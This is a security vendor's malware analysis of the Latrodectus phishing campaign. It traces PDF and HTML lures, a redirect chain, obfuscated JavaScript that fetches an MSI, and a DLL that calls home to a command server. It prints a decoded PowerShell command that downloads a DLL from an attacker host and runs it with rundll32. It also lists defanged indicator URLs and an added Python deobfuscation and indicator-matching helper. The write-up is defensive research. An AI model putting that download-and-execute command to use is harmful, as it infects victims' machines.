Inside the Latrodectus Malware Campaign Old School Phishing Meets Innovative Payload Delivery

www.forcepoint.com · Mayur Sewani · 1 year ago · research
Inside the Latrodectus Malware Campaign
Old school phishing meets innovative payload delivery
October 18, 2024 | Mayur Sewani, Forcepoint X-Labs Research

This report offers an in-depth analysis of recent Latrodectus campaign activity uncovered by our X-Labs research team. One of the principal dissemination techniques for Latrodectus involves phishing emails, leveraging infrastructure like that of IcedID. Latrodectus primarily targets the financial, automotive and healthcare business sectors. By compromising email accounts and distributing malicious attachments, it propagates across a broader network of potential targets.

Currently, threat actors are increasingly adopting Latrodectus, utilizing prevalent attachment formats such as HTML and PDF. It is typically engineered for stealth and persistence, complicating detection and eradication efforts. This can lead to the exfiltration of personal data, financial losses due to fraud or extortion, and the compromise of sensitive information.

The Latrodectus campaign initiates with attacks originating from a compromised email that appears to contain critical DocuSign documents. Users are encouraged to access the document via the provided link. When the link is clicked, users are redirected to a malicious URL, resulting in the inadvertent download of the next-stage payload.

Fig. 1 - Attack chain
Fig. 2 - Initial access PDF
Fig. 3 - PDF suspicious embedded URL

The PDF contains a compromised domain with a redirection: “hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW”. It redirects through the shortener URL to another suspicious domain, “hxxps://digitalpinnaclepub[.]com/?3”, and finally redirects to a storage.googleapis.com project to download the malicious obfuscated JavaScript: “hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js”

Obfuscated JavaScript Analysis:
The JavaScript contains a lot of junk messages in “//” comments, which increases obfuscation and file size. The actual malicious JavaScript code is commented out with “////”.

Fig. 4 - Obfuscated JavaScript payload

After removing the junk messages, what remains is obfuscated JavaScript built from string manipulation replace and join functions. Replacing “////” with a space (“ ”) shows the actual malcode.

Fig. 5 - Deobfuscated JavaScript string manipulation functions

After deobfuscation, it creates ActiveXObject("WindowsInstaller.Installer") and downloads a .msi installer file. See Fig. 6 below:

Fig. 6 - Deobfuscated JavaScript code downloads MSI file

MSI Analysis:
The MSI file is executed via the JavaScript and drops a malicious 64-bit .dll file in %appdata%. It also executes the .dll with rundll32.exe, passing the export function as a parameter.

Fig. 7 - MSI file

The dropped .dll contains the export function “GetDeepDVCState”, and the MSI executes this .dll with the parameter “/DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\Admin\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState”.

DLL Analysis:
The DLL is a Microsoft Visual C++ 64-bit binary with fake NVIDIA version information:

Fig. 8 - DLL version info

Upon analysis, this DLL unpacks another-stage DLL payload in memory:

Fig. 9 - DLL version info

The unpacked 64-bit DLL binary connects to a malicious C2 server on the unusual port 8041: greshunka[.]com:8041/bazar.php

Initial Access via HTML Phishing
The HTML page looks like a Word document pop-up to the user.
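A Python triage helper, added here as an example and not code from the original write-up or the campaign, that applies the two decoding steps described for the JavaScript dropper above and the HTML lure below: dropping the “//” junk lines and turning “////” into a space, then un-reversing the ll() strings and decoding the atob() blob. The sample script and HTML are constructed; the .msi URL in the sample is a placeholder and the indicator list is my own choice.

```python
import base64
import re

# Constructed sample (not the campaign file): junk "//" comment lines pad the
# script while the live statements sit behind "////", as in Fig. 4.
JS_SAMPLE = """\
// Dear customer, please find the attached invoice for last month
////var inst = new ActiveXObject("WindowsInstaller.Installer");
// Kind regards, accounting department
////var msi = "hxxp://PLACEHOLDER-MSI-HOST/dsa.msi";  // placeholder URL
"""

def recover_js(src):
    """Drop the '//' junk lines, then turn '////' into a space (the write-up's step)."""
    live = [ln for ln in src.splitlines() if ln.lstrip().startswith("////")]
    return "\n".join(ln.replace("////", " ", 1).strip() for ln in live)

# HTML lure pieces from Fig. 10/11: the reversed prompt string and the command
# the write-up decodes; the atob() blob is built here for the constructed sample.
PROMPT = ('.nottub >b/<"noituloS">b< eht gnisu woleb snoitcurtsni eht wollof '
          'esaelP .tnemucod siht fo yalpsid enilffo tcerroc troppus ton seod resworb ruoY')
CMD = ("cmd /c start /min powershell $path='%appdata%\\witwin_st_x64.dll';"
       "iwr hxxp://gertioma[.]top/o.jpg -outfile $path; "
       "start-process rundll32 $path,NxReleasePMap8==")
HTML_SAMPLE = (
    "<script>function ll(s){return s.split('').reverse().join('');}\n"
    f"document.getElementById('prompt').innerHTML = ll('{PROMPT}');\n"
    f"var c = window.atob('{base64.b64encode(CMD.encode()).decode()}');</script>"
)

def decode_html_strings(html):
    """Return (un-reversed ll() literals, decoded atob() payloads) found in the HTML."""
    unreversed = [s[::-1] for s in re.findall(r"ll\('([^']*)'\)", html)]
    decoded = [base64.b64decode(b).decode("utf-8", "replace")
               for b in re.findall(r"atob\('([A-Za-z0-9+/=]+)'\)", html)]
    return unreversed, decoded

# Strings the write-up ties to this chain; matched case-insensitively, in this order.
INDICATORS = ("WindowsInstaller.Installer", "powershell", "iwr ", "rundll32", "-outfile")

def triage(text):
    """Indicators from INDICATORS present in the deobfuscated text."""
    low = text.lower()
    return [ind for ind in INDICATORS if ind.lower() in low]
```

Running triage() over the recovered JavaScript flags the WindowsInstaller object, and over the decoded atob() blob it flags the PowerShell download-and-rundll32 pattern, which is the split between the MSI and the HTML variants of this chain.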
Clicking on the button executes malicious JavaScript code embedded in the HTML. See Fig. 10 below:

Fig. 10 - HTML attachment

It contains pop-up warning messages stored in reverse order:

“document.getElementById("prompt").innerHTML = ll('.nottub >b/<"noituloS">b< eht gnisu woleb snoitcurtsni eht wollof esaelP .tnemucod siht fo yalpsid enilffo tcerroc troppus ton seod resworb ruoY');”

Reversed message: Your browser does not support correct offline display of this document. Please follow the instructions below using the

It also uses a different string encoding, window.atob(), and the obfuscation function s.split("").reverse().join("");

Fig. 11 - Suspicious code in HTML

Decoded base64 code:

cmd /c start /min powershell $path='%appdata%\witwin_st_x64.dll';iwr hxxp://gertioma[.]top/o.jpg -outfile $path; start-process rundll32 $path,NxReleasePMap8==

This shows that the threat actors use HTML to launch PowerShell, which directly downloads the DLL payload without an MSI, executes it with rundll32.exe and connects to the C2. We have observed a few campaigns with an HTML attachment in compromised emails.

Conclusion:
Threat actors continue to use older emails to target users via suspicious PDF or HTML attachments. They use a redirection method with URL shorteners and host malicious payloads on the well-known storage[.]googleapis[.]com hosting projects. The obfuscated JavaScript is then downloaded to fetch the MSI, which uses rundll32.exe to execute the 64-bit DLL.

This campaign mixes the old with the new. Latrodectus leverages older infrastructure, combined with a new, innovative malware payload distribution method, against the financial, automotive and business sectors.

Protection statement:
Forcepoint customers are protected against this threat at the following stages of attack:
Stage 2 (Lure) – Malicious PDF and HTML attachments associated with these attacks are identified and blocked.
Stage 3 (Redirect) – Blocked the redirecting shortened URLs and compromised domains.
Stage 5 (Dropper File) – The dropper files are added to the Forcepoint malicious database and are blocked.
Stage 6 (Call Home) – Blocked C2 credentials.

IOCs
Initial Stage URLs:
hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
hxxps://digitalpinnaclepub[.]com/?3
hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js
hxxp://194[.]54[.]156[.]91/dsa.msi
hxxp://gertioma[.]top/o.jpg

Mayur Sewani serves as a Senior Security Researcher as part of the Forcepoint X-Labs Research Team. He focuses on APT malware, information stealers and phishing attacks, and also works to stay on top of the latest threats. He is passionate about advancing the field of defensive adversary emulation and research.